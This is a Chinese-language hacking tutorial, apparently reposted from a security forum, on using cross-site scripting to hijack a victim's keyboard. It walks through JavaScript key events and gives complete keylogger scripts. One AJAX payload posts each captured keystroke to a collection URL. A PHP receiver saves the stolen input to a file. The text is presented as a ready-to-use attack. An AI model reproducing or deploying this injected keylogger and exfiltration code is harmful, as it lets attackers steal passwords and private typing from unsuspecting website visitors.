Xss高级技巧劫持键盘

XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意 攻击用户的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常忽略其危害性这里是我们自己的交流平台,!今天就来说说这个劫持键盘怎 么怎么实现的这里是我们自己的交流平台,是属于我们90sec所有成员的技术分享平台!7Js里面的最主要的就是这几个按键事件
当用户按下键盘按键时触发。
当用户按下字面键时触发。
onkeyup                           当用户释放键盘按键时触发。

Onkeydown 和onkeyup 获取的都是大写的 几乎所有的字符串都是可以获取的
Onkeyoress 获取的是小写 一些打印字符获取不了 例如退格 等等 但是!像这些字符shift+1 他是直接获取!不像onkeydown onkeyup都是获取两个字符的document.onkeydown = keydown;像这样子随便在键盘上按一个键都会触发这一个函数其他的也是一样的我们还需要考虑一下浏览器 不同的浏览器 获取的对象都是不一样的
Ie的话我们用 event.keyCode;像火狐的的就要
; U9 q3 `” M4 N. u” w  Z加一个参数然后要用的which对象属性view sourceprint?1 function keydown(x){

2 var keycode=x.which;

3 }

4 Document.onkeydown=keydown;
因为获取都是键盘数 (keycode)所以呢还需要用 String.fromCharCode进行转换
下面是ie的是三个键盘事件的代码view sourceprint?01 <HTML>

02 <HEAD><TITLE>onkeypress</TITLE>

03

04 </HEAD>

05 <BODY>

06 <script type=”text/javascript”>

07         var aaa=””;

08         var bbb=””;

09   function onkeypress() {

10            var keycode = event.keyCode;

11            var realkey = String.fromCharCode(event.keyCode);

12                 aaa+=realkey;

13                 bbb+=keycode;

14        document.getElementById(“sb”).innerHTML=aaa;

15         document.getElementById(“eb”).innerHTML=bbb;

16        }

17        document.onkeypress = onkeypress;

18 </script>

19 <div id=”sb”></div>

20 <hr>

21 <div id=”eb”></div>

22 </BODY>

23 </HTML>
view sourceprint?01 <HTML>

02 <HEAD><TITLE>keydown</TITLE>

03

04 </HEAD>

05 <BODY>

06 <script type=”text/javascript”>

07         var aaa=””;

08         var bbb=””;

09   function keydown() {

10            var keycode = event.keyCode;

11            var realkey = String.fromCharCode(event.keyCode);

12                 aaa+=realkey;

13                 bbb+=keycode;

14        document.getElementById(“sb”).innerHTML=aaa;

15         document.getElementById(“eb”).innerHTML=bbb;

16        }

17       document.onkeydown =keydown;

18 </script>

19 <div id=”sb”></div>

20 <hr>

21 <div id=”eb”></div>

22 </BODY>

23 </HTML>
view sourceprint?01 <HTML>

02 <HEAD><TITLE>keyup</TITLE>

03

04 </HEAD>

05 <BODY>

06 <script type=”text/javascript”>

07         var aaa=””;

08         var bbb=””;

09   function keyup() {

10            var keycode = event.keyCode;

11            var realkey = String.fromCharCode(event.keyCode);

12                 aaa+=realkey;

13                 bbb+=keycode;

14        document.getElementById(“sb”).innerHTML=aaa;

15         document.getElementById(“eb”).innerHTML=bbb;

16        }

17      document.onkeyup =keyup;

18 </script>

19 <div id=”sb”></div>

20 <hr>

21 <div id=”eb”></div>

22 </BODY>

23 </HTML>
根据他们的不同..相互互补完成了这一样一个脚本 能看懂的就看下把 功能差不多归功于onkeypress  onkeypress获取不到都用keydown来获取view sourceprint<HTML>

02 <HEAD><TITLE>js劫持键盘代码by Darkmoon</TITLE>

03

04 </HEAD>

05 <BODY>

06 <script type=”text/javascript”>

07         var aaa=””;

08         var bbb=””;

09   function onkeypress() {

10        var keycode = event.keyCode;

11                 //var keyname=0;

12        //var realkey = String.fromCharCode(event.keyCode);

13         switch(keycode){

14         case 8: case 9:case 13:case 32:case 37:case 38:case 39:case 40:case 46:keyname=””;break;

15

16         break;

17      default:keyname = String.fromCharCode(keycode);break;

18                 }

19                 aaa+=keycode;

20                 bbb+=keyname;

21 //document.getElementById(“sb”).innerHTML=aaa;

22 document.getElementById(“xb”).innerHTML=bbb;

23         }

24

25         function keydown(){

26          var keycode = event.keyCode;

27         if((keycode>7&&keycode<14)||(keycode>31&&keycode<47)){

28         switch(keycode){

29              case 8: keyname = “[退格]”; break;

30           case 9: keyname = “[制表]”; break;

31           case 13:keyname = “[回车]”; break;

32           case 32:keyname = “[空格]”; break;

33           case 33:keyname = “[PageUp]”;   break;

34           case 34:keyname = “[PageDown]”;   break;

35           case 35:keyname = “[End]”;   break;

36           case 36:keyname = “[Home]”;   break;

37           case 37:keyname = “[方向键左]”;   break;

38           case 38:keyname = “[方向键上]”;   break;

39           case 39:keyname = “[方向键右]”;   break;

40           case 40:keyname = “[方向键下]”;   break;

41           case 46:keyname = “[删除]”;   break;

42           default:keyname = “”;break;

43                 }

44

45

46                 }else{

47

48                 keyname=””;

49                 }

50 bbb+=keyname;

51 document.getElementById(“xb”).innerHTML=bbb;

52         }

53

54      document.onkeypress = onkeypress;

55          document.onkeydown = keydown;

56

57 </script>

58

59 <div id=”eb”></div>

60 <Hr>

61 <div id=”xb”></div>

62 </BODY>

63 </HTML>
上面是综合写了一个脚本
如图:   下载 (21.13 KB)

2011-10-24 22:51
那 么xss呢 说到xss的不能不说ajax 技术 xss的利用很大归功于ajax 基于本文不是基础的. 不理解的话先看一下资料 或者百度一下吧 或者找我以前做个视频教程………….” 下面是花了一天时间写的02                 var request=false;

03

04                 //window对象中有XMLHttpRequest存在就是非IE,包括(IE7,IE8)

05                 if(window.XMLHttpRequest){

06                         request=new XMLHttpRequest();

07

08                         if(request.overrideMimeType){

09                                 request.overrideMimeType(“text/xml”);

10                         }

11

12

13                 //window对象中有ActiveXObject属性存在就是IE

14                 }else if(window.ActiveXObject){

15

16                         var versions=[‘Microsoft.XMLHTTP’, ‘MSXML.XMLHTTP’, ‘Msxml2.XMLHTTP.7.0′,’Msxml2.XMLHTTP.6.0′,’Msxml2.XMLHTTP.5.0’, ‘Msxml2.XMLHTTP.4.0’, ‘MSXML2.XMLHTTP.3.0’, ‘MSXML2.XMLHTTP’];

17

18                         for(var i=0; i<versions.length; i++){

19                                         try{

20                                                 request=new ActiveXObject(versions[i]);

21

22                                                 if(request){

23                                                         return request;

24                                                 }

25                                         }catch(e){

26                                                 request=false;

27                                         }

28                         }

29                 }

30                 return request;

31         }

32

33 //注意: 要每次请求都要使用一个新的XMLHttpRequest

34 /*

35         如果使用get将数据传给服务器,则服务器就使用$_GET

36         就直接通过Url将数据传给服务器

37

38         使用POST时一定要使用        ajax.setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”);

39

40

41   */

42 var ajax=null;

43 var xl=”username=”;

44

45

46

47

48

49 function onkeypress() {

50

51

52        var realkey = String.fromCharCode(event.keyCode);

53             xl+=realkey;

54                 show();

55         }

56

57 document.onkeypress = onkeypress;

58

59 function show(){

60

61         ajax=createAjax();

62         ajax.onreadystatechange=function(){

63

64                 if(ajax.readyState==4){

65                         if(ajax.status==200){

66                                 var data=ajax.responseText;

67

68                                 //alert(data);

69

70                         }else{

71                                 alert(“页面请求失败”);

72                         }

73                 }

74         }

75         //document.onkeypress = onkeypress;

76         var postdate = xl;

77         ajax.open(“POST”, “http://127.0.0.1/yans/post.php“, true);

78         ajax.setRequestHeader(“Content-type”, “application/x-www-form-urlencoded”);

79         ajax.setRequestHeader(“Content-length”, postdate.length);

80         ajax.setRequestHeader(“Connection”, “close”);

81         ajax.send(postdate);

82

83

84

85         //ajax.send(null);

86

87         //by darkmoon link:90sec.org blog:blog.moonhack.com

88

89 }
还有接收的php脚本只要调用一下js文件 xss劫持键盘就能够实现!!!!!!!<?php

2 //if($_POST[‘bbb’]){

3 $a=$_POST[‘username’];

4 $handle=fopen(‘fuck.txt’,”w”);

5 fwrite($handle,$a.”rn”);

6 //}

7

8 ?>

转自落泪红尘博客由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理,转载请著名出处。